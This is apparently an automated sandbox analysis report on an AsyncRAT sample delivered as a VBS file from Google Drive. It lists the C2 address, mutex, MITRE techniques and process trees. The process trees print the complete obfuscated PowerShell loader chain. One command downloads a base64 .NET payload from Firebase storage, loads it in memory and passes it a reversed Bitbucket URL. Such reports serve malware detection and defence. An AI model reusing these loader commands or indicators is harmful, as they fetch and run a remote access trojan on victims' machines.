asyncrat | hxxps://drive[.]google[.]com/uc?export=download&id=1K8vFGPUDPht2uZ6oOgkJbXo0DqUrJ7Rz

Analysis

max time kernel
70s
max time network
69s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09-08-2024 03:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/uc?export=download&id=1K8vFGPUDPht2uZ6oOgkJbXo0DqUrJ7Rz

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

zorra123.duckdns.org:2020

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 9 IoCs

flow	pid	Process
37	336	powershell.exe
39	336	powershell.exe
42	336	powershell.exe
59	2164	powershell.exe
60	2164	powershell.exe
62	2164	powershell.exe
64	4112	powershell.exe
65	4112	powershell.exe
67	4112	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
580	powershell.exe
4112	powershell.exe
4572	powershell.exe
336	powershell.exe
2020	powershell.exe
2164	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
38	bitbucket.org
39	bitbucket.org
60	bitbucket.org
65	bitbucket.org
2	drive.google.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 336 set thread context of 3568	336	powershell.exe	104
PID 2164 set thread context of 3092	2164	powershell.exe	110
PID 4112 set thread context of 3420	4112	powershell.exe	117

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133676495574249797"	chrome.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
232	chrome.exe
232	chrome.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
336	powershell.exe
336	powershell.exe
336	powershell.exe
2020	powershell.exe
2020	powershell.exe
2020	powershell.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe
580	powershell.exe
580	powershell.exe
580	powershell.exe
4112	powershell.exe
4112	powershell.exe
4112	powershell.exe
4112	powershell.exe
4112	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
232	chrome.exe
232	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeDebugPrivilege	336	powershell.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe
Token: SeShutdownPrivilege	232	chrome.exe
Token: SeCreatePagefilePrivilege	232	chrome.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe
232	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 232 wrote to memory of 1664	232	chrome.exe	83
PID 232 wrote to memory of 1664	232	chrome.exe	83
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1112	232	chrome.exe	84
PID 232 wrote to memory of 1384	232	chrome.exe	85
PID 232 wrote to memory of 1384	232	chrome.exe	85
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86
PID 232 wrote to memory of 1656	232	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://drive.google.com/uc?export=download&id=1K8vFGPUDPht2uZ6oOgkJbXo0DqUrJ7Rz
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8078ecc40,0x7ff8078ecc4c,0x7ff8078ecc58
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1880,i,8779617292171267591,663452063061729274,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1876 /prefetch:2
  2⤵
  PID:1112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,8779617292171267591,663452063061729274,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2132 /prefetch:3
  2⤵
  PID:1384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,8779617292171267591,663452063061729274,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2412 /prefetch:8
  2⤵
  PID:1656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,8779617292171267591,663452063061729274,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,8779617292171267591,663452063061729274,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4576,i,8779617292171267591,663452063061729274,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4588 /prefetch:8
  2⤵
  PID:784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5040,i,8779617292171267591,663452063061729274,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5060 /prefetch:8
  2⤵
  PID:5020

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2380

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2888

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Leer Documento.vbs"
1⤵
- Checks computer location settings
PID:636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bk▒Gk▒a▒Br▒HQ▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HI▒bgBx▒HU▒Z▒▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒G0▒YwBr▒G0▒b▒▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒bQBj▒Gs▒bQBs▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒cgBu▒HE▒dQBk▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒F8▒XwBh▒HY▒ZwBk▒GY▒cwBk▒GY▒YQBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bk▒Gk▒a▒Br▒HQ▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Leer Documento.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$dihkt = '0';$rnqud = 'C:\Users\Admin\Downloads\Leer Documento.vbs';[Byte[]] $mckml = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($mckml).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $rnqud , '_______avgdfsdfa________________-------------', $dihkt, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:336
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3568

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Leer Documento.vbs"
1⤵
- Checks computer location settings
PID:2524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bk▒Gk▒a▒Br▒HQ▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HI▒bgBx▒HU▒Z▒▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒G0▒YwBr▒G0▒b▒▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒bQBj▒Gs▒bQBs▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒cgBu▒HE▒dQBk▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒F8▒XwBh▒HY▒ZwBk▒GY▒cwBk▒GY▒YQBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bk▒Gk▒a▒Br▒HQ▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Leer Documento.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$dihkt = '0';$rnqud = 'C:\Users\Admin\Downloads\Leer Documento.vbs';[Byte[]] $mckml = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($mckml).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $rnqud , '_______avgdfsdfa________________-------------', $dihkt, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:2164
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
